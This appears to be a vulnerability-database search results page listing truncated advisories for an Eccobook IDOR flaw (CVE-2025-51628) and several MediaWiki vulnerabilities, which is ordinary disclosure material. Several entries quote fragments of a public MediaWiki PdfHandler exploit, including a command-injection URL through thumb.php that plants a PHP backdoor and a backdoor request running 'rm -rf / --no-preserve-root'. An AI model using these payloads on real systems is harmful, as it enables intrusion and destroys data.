19 matches found
EUVD-2025-23639
Malicious code in bioql PyPI...
CVE-2025-51628
Insecure Direct Object Reference (IDOR) vulnerability in PdfHandler component in Agenzia Impresa Eccobook v2.81.1 and below allows unauthenticated attackers to read confidential documents via the DocumentoId parameter...
CVE-2025-51628
Insecure Direct Object Reference (IDOR) vulnerability in PdfHandler component in Agenzia Impresa Eccobook v2.81.1 and below allows unauthenticated attackers to read confidential documents via the DocumentoId parameter...
CVE-2025-51628
Insecure Direct Object Reference (IDOR) vulnerability in PdfHandler component in Agenzia Impresa Eccobook v2.81.1 and below allows unauthenticated attackers to read confidential documents via the DocumentoId parameter...
Agenzia Impresa EccoBook Security Vulnerability
Agenzia Impresa EccoBook is a ledger software from Agenzia Impresa, Italy. A security vulnerability exists in Agenzia Impresa Eccobook v2.81.1 and earlier versions, which stems from an insecure direct object reference in the PdfHandler component that could lead to the reading of confidential...
CVE-2025-51628
The CVE-2025-51628 vulnerability affects the PdfHandler component in Agenzia Impresa Eccobook versions up to 2.81.1 (and prior to 2.81.2). It is an insecure direct object reference (IDOR) that allows unauthenticated attackers to read confidential documents by supplying a DocumentoId parameter. Th...
CVE-2025-51628
Insecure Direct Object Reference (IDOR) vulnerability in PdfHandler component in Agenzia Impresa Eccobook v2.81.1 and below allows unauthenticated attackers to read confidential documents via the DocumentoId parameter...
Fedora 29 : mediawiki (2018-f4b65fc7cd)
https://www.mediawiki.org/wiki/Releasenotes/1.29 MediaWiki 1.29.3 - T169545, CVE-2018-0503 SECURITY: $wgRateLimits entry for 'user' overrides 'newbie'. - T194605, CVE-2018-0505 SECURITY: BotPasswords can bypass CentralAuth's account lock. - T180551 Fix LanguageSrTest for language converter - T18055...
Fedora 28 : mediawiki (2018-e022ecbc52)
https://www.mediawiki.org/wiki/Releasenotes/1.29 MediaWiki 1.29.3 - T169545, CVE-2018-0503 SECURITY: $wgRateLimits entry for 'user' overrides 'newbie'. - T194605, CVE-2018-0505 SECURITY: BotPasswords can bypass CentralAuth's account lock. - T180551 Fix LanguageSrTest for language converter - T18055...
Fedora 27 : mediawiki (2018-edf90410ea)
https://www.mediawiki.org/wiki/Releasenotes/1.29 MediaWiki 1.29.3 - T169545, CVE-2018-0503 SECURITY: $wgRateLimits entry for 'user' overrides 'newbie'. - T194605, CVE-2018-0505 SECURITY: BotPasswords can bypass CentralAuth's account lock. - T180551 Fix LanguageSrTest for language converter - T18055...
Debian DSA-2891-1 : mediawiki, mediawiki-extensions Multiple Vulnerabilities
The remote Debian host is missing a security update. It is, therefore, affected by multiple vulnerabilities in MediaWiki : - A cross-site scripting (XSS) vulnerability exists due to a failure to validate input before returning it to the user. An unauthenticated, remote attacker can exploit this, vi...
MediaWiki thumb.php 'w' Parameter Remote Shell Command Injection
The version of MediaWiki running on the remote host is affected by a remote command injection vulnerability due to a failure to properly sanitize user-supplied input to the 'w' parameter in the 'thumb.php' script. A remote, unauthenticated attacker can exploit this issue to execute arbitrary...
MediaWiki 1.22.1 PdfHandler Remote Code Execution
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 MediaWiki images/xnz.php 3. access to php-backdoor! http://vulnerable-site/images/xnz.php?1=rm%20-rf%20%2f%20--no-preserve-root 4. happy pwning!! Related files: thumb.php -- extract all GET array to params /extensions/PdfHandler/PdfHandlerbody.php --...
MediaWiki <= 1.22.1 PdfHandler Remote Code Execution Exploit
Exploit for multiple platform in category web applications MediaWiki images/xnz.php 3. access to php-backdoor! http://vulnerable-site/images/xnz.php?1=rm%20-rf%20%2f%20--no-preserve-root 4. happy pwning!! Related files: thumb.php -- extract all GET array to params...
MediaWiki <= 1.22.1 PdfHandler Remote Code Execution Exploit
Exploit for multiple platform in category web applications Exploit: 1. upload Longcat.pdf to wikimedia cms site with PDF Handler enabled http://vulnerable-site/index.php/Special:Upload 2. inject os cmd to upload a php-backdoor http://vulnerable-site/thumb.php?f=Longcat.pdf&w=10|echo%20...
MediaWiki 1.22.1 PdfHandler - Remote Code Execution
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 MediaWiki images/xnz.php 3. access to php-backdoor! http://vulnerable-site/images/xnz.php?1=rm%20-rf%20%2f%20--no-preserve-root 4. happy pwning!! Related files: thumb.php -- extract all GET array to params /extensions/PdfHandler/PdfHandlerbody.php --...
MediaWiki 1.22.1 PdfHandler - Remote Code Execution
MediaWiki 1.22.1 PdfHandler - Remote Code Execution -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 MediaWiki images/xnz.php 3. access to php-backdoor! http://vulnerable-site/images/xnz.php?1=rm%20-rf%20%2f%20--no-preserve-root 4. happy pwning!! Related files: thumb.php -- extract all GET array to...
MediaWiki < 1.19.11 / 1.21.5 / 1.22.2 Multiple Remote Code Execution Vulnerabilities
According to its version number, the instance of MediaWiki running on the remote host is affected by the following remote code execution vulnerabilities : - A user-input validation error exists during thumbnail generation in the 'thumb.php' script that allows the execution of arbitrary shell...
MediaWiki Remote Code Execution vulnerability leaves Wikipedia open for Cyber attacks
The Encyclopedia giant WIKIPEDIA has been found vulnerable to remote code execution because of a critical flaw in the MediaWiki software. Wikipedia is a name which has become a major source of information for all of us. It has webpages on almost every topic you need to search. This giant is power...